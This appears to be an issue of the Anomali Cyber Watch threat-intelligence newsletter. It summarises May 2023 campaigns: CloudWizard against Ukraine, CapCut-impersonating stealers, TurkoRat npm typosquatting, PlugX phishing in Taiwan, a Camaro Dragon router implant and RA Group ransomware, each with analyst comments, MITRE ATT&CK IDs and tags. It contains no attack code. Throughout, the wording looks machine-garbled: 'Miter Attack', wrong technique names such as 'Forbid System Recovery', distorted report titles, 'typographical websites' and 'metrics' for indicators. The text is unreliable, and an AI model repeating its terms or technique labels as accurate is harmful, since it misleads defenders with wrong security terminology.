The various threat intelligence stories in this iteration of Anomali Cyber Watch cover the following topics: APT, China, Data Leakage, Infostealers, Package Name Typosquatting, Phishing, and Ukraine. IOCs related to these stories are attached to the Anomali Cyber Watch and can be used to check logs for potentially malicious activity.
Figure 1 – IOC summary chart. This chart summarizes the IOCs attached to this magazine and provides a glimpse into the threats discussed.
The latest cyber news and threat intelligence
CloudWizard APT: The Story of Bad Magic Continues
(Post Date: May 19, 2023)
A newly discovered modular malware framework called CloudWizard has been active since 2016. Kaspersky researchers were able to link it to previously recorded advanced persistent threat activity: Operation Groundbait and Prikormka malware (2008-2016), Operation BugDrop (2017), and PowerMagic. (2020-2022) and CommonMagic (2022). Similar to previous campaigns, CloudWizard targets individuals, diplomatic and research organizations in Donetsk, Lugansk, Crimea, Central and Western Ukraine regions. CloudWizard’s two main modules perform encryption and decryption of all communications and deliver encrypted data to the cloud or web-based C2. Additional modules allow you to take screenshots, record microphones, keylogging, and more.
Analyst Comments: ESET researchers previously concluded that the actors behind the groundbait operation were most likely operating within Ukraine, but Kaspersky researchers did not share whether they agreed with this attribution. Wars and military conflicts drive additional cyber activity. All known CloudWizard metrics are available on the Anomali platform and customers are encouraged to block them in their infrastructure.
Miter Attack: [MITRE ATT&CK] T1027 – Obfuscated files or information | [MITRE ATT&CK] T1140 – File or Information Obfuscation/Decoding | [MITRE ATT&CK] T1555 – Credentials in Password Store | [MITRE ATT&CK] T1056.001 – Input Capture: Keylogging | [MITRE ATT&CK] T1573 – Encrypted Channel
tag: Actor: CloudWizard, APT, Target Country: Ukraine, Target Region: Donetsk, Target Region: Lugansk, Target Region: Crimea, Target Region: Central Ukraine, Target Region: Western Ukraine, Campaign: Operation Bug Drop, Campaign: Operation Groundbait, Malware:Prikormka, Malware:CloudWizard, Malware:PowerMagic, Malware:CommonMagic, Target Industry:Diplomacy, Target Industry:Research, Abuse:OneDrive, FileType:DLL, FileType:VFS, File-Type:LRC, Target System:Windows
CapCut User Attack
(Post Date: May 19, 2023)
Some campaigns target users of CapCut video editing software with typographical websites. Users in jurisdictions where this popular ByteDance product is banned (Taiwan, India, and several other countries) are particularly vulnerable. One campaign profiled by Cyble researchers features an Offx stealer. Another campaign presents BatLoader leading to RedLine Stealer and Antimalware Scan Interface (AMSI) bypass tool. At the time of discovery, it was not detected by any antivirus engine.
Analyst Comments: Users should avoid downloading pirated software from unofficial websites. All known indicators related to this CapCut impersonation campaign are available on the Anomali platform and customers are encouraged to block these indicators in their infrastructure.
Miter Attack: [MITRE ATT&CK] T1566 – Phishing | [MITRE ATT&CK] T1059.001: Powershell | [MITRE ATT&CK] T1204 – User run | [MITRE ATT&CK] T1027 – Obfuscated files or information | [MITRE ATT&CK] T1555 – Credentials in Password Store | [MITRE ATT&CK] T1539 – Web Session Cookie Stealing | [MITRE ATT&CK] T1552 – Unsecured Credentials | [MITRE ATT&CK] T1528 – Application Access Token Stealing | [MITRE ATT&CK] T1113 – screen capture | [MITRE ATT&CK] T1486: Encrypted Data for Impact | [MITRE ATT&CK] T1490: Forbid System Recovery | [MITRE ATT&CK] T1095 – non-application layer protocol | [MITRE ATT&CK] T1071 – Application Layer Protocol | [MITRE ATT&CK] T1567 – Leakage via web service | [MITRE ATT&CK] T1041 – Outflow through C2 channel | [MITRE ATT&CK] T1562.001: Disable or Modify Tools
tag: Malware:Offx, Malware-Type:Infostealer, Malware:BatLoader, Malware-Type:Loader, Malware:RedLine, Disguise:CapCut, Target:CapCut User, Skills:Phishing, Target Country:Taiwan, Target Country:India, Malware-Type:Infostealer , file type:EXE, file type:BAT, abuse:PowerShell, target system:Windows
Found a RAT hiding in the npm attic
(Post Date: May 18, 2023)
Malicious packages from npm public repositories went undetected for up to two months. The attacker used typosquatting and impersonation of the names of well-known and legitimate packages, used the code, and included links to legitimate GitHub repositories. Researchers at ReversingLabs have determined that this campaign aims to provide a modified version of the open-source TurkoRat infostealer. It was used to steal user information and cryptocurrency wallets.
Analyst Comments: Development organizations should take steps to avoid mistyping dependencies and scrutinize the functionality and behavior of code that depends on them. Organizations should be alert to suspicious combinations of code behavior, such as naming mismatches, command execution, hard-coded IP addresses, smaller-than-expected downloads, questionable versioning, and writing data to files. Metrics related to this TurkoRat campaign are available on the Anomali platform for persistent infection and historical reference.
Miter Attack: [MITRE ATT&CK] T1195.002 – Compromised Supply Chain: Compromised Software Supply Chain | [MITRE ATT&CK] T1036.005 – Impersonation: Match Legitimate Name or Location | [MITRE ATT&CK] T1036 – Camouflage | [MITRE ATT&CK] T1555 – Credentials in Password Store
tag: Malware:TurkoRat, Malware-Type:Infostealer, Malware-Type:Clipper, Abuse:npm, Technology:Supply Chain, Technology:PackageName Typosquatting, Actor:AliTefeli02, FileType:JS, Filetype:EXE, Target Industry:Software Publishers, target -industry:Cryptocurrency, target-system:Windows
China-Taiwan tensions spike cyberattacks on Taiwan
(Post Date: May 17, 2023)
In April 2023, rising geopolitical tensions between China and Taiwan led to increased cyberattacks against Taiwan via malicious emails and phishing URLs. PlugX and other malware detections have been identified by Trellix researchers. Malicious emails targeted a variety of industries, with networking/IT, manufacturing and logistics being the most affected. The phishing URLs turned out to be generic login pages, targeted company-specific pages, and multi-brand login pages aimed at collecting credentials. Three days after the peak in phishing email volume, PlugX RAT detections spiked as other malware families were sighted, such as Formbook, Kryptik, and Zmutzy.
Analyst Comments: All employees must be trained on the risks of phishing, particularly how to identify such attempts and who to contact if a phishing attack is identified. Unwarranted emails that ask recipients to enter their credentials by following a link may indicate a phishing attack. Host-based metrics related to this campaign are available on the Anomali platform and customers are encouraged to block them in their infrastructure.
Miter Attack: [MITRE ATT&CK] T1566.002 – Phishing: Spear Phishing Links | [MITRE ATT&CK] T1078 – valid account | [MITRE ATT&CK] T1574.002 – Stealing Execution Flow: Dll Sideloading | [MITRE ATT&CK] T1056.001 – Input Capture: Keylogging | [MITRE ATT&CK] T1113 – screen capture
tag: Malware:PlugX, Detect:BackDoor-PlugX, Detect:Trojan:Win32/Korplug, Malware:Kryptik, Malware:Zmutzy, Detect:Trojan-AutoIt, Malware:Formbook, Target Industry:Networking, Target Industry:Manufacturing, Target- Country: Taiwan, Target Industry:Logistics, File Type:ISO, File Type:DLL, Target System:Windows
For Selling Camaro: Analyzing Custom Router Implants
(Post Date: May 16, 2023)
Check Point researchers recently discovered a malicious firmware implant made for TP-Link routers. The implant is related to a Chinese-sponsored group known as the Camaro Dragon and is similar to previously reported activity carried out by the Mustang Panda group. The attacker trojanized the TP-Link firmware image by modifying two files and adding four files to the changed router firmware. The implant contains several malicious components, including Horse Shell, a custom backdoor that enables remote shells, file transfers and network tunneling, making it easier to anonymize communications through chains of infected nodes.
Analyst Comments: Although the exact attack technique is unknown, it is important to keep network devices patched with the latest security updates. Metrics related to this campaign and HorseShell implant detection YARA rules provided by Check Point are available on the Anomali platform.
Miter Attack: [MITRE ATT&CK] T1005: Data from local system | [MITRE ATT&CK] T1090 – Proxy | [MITRE ATT&CK] Picus: System Information Retrieval Technology Explained – MITER ATT&CK T1082 | [MITRE ATT&CK] T1016 – Retrieve system network configuration | [MITRE ATT&CK] T1573 – Encrypted Channel
signature: CamaroDragon’s HorseShell Implant – YARA by Check Point
tag: Actor:Camaro Dragon, Malware:Horse Shell, Detection:HorseShell, Malware Type:Backdoor, Malware Type:Implant, Actor:Mustang Panda, Source Country:China, Target Region:Europe, File Type:ELF, File-Type :LOG, file type:DAT, target device:TP-Link router, target system:Linux
Newly Identified RA Group Infringes U.S. and South Korean Firms With Leaked Babuk Source Code
(Post Date: May 15, 2023)
The RA Group is a new ransomware group that has been actively exposing targeted data since April 2023. This group uses a double extortion tactic. Talos researchers have confirmed that the Ra Group ransomware is based on the leaked Babuk ransomware source code. The ransomware code appears to include the target’s name, is written in C++, and uses an encryption scheme with the curve25519 and eSTREAM cipher hc-128 algorithms for encryption. The group’s first exposure was to organizations in the United States and South Korea.
Analyst Comments: Ransomware is a constantly evolving threat, and the most fundamental defense is to have a proper backup and restore process in place to recover affected data without having to decrypt it. Data theft can be contained through segmentation, encryption of data at rest, and limiting storage of personal and sensitive data.
Miter Attack: [MITRE ATT&CK] T1486: Encrypted Data for Impact | [MITRE ATT&CK] T1490: Forbid System Recovery
tag: Actor:RA Group, Target Country:USA, Target Country:South Korea, Malware:Babuk, Detected:Win.Ransomware.Babuk, MalwareType:Ransomware, Malware:RA, Detected:Ransomware/Win.RA, Abuse: qTox, Abuse :TOR, Data Breach Site, Target Industry:Manufacturing, Target Industry:Wealth Management, Target Industry:Insurance, Target Industry:Pharma, File Type:EXE, File Type:GAGUP, Target System:Windows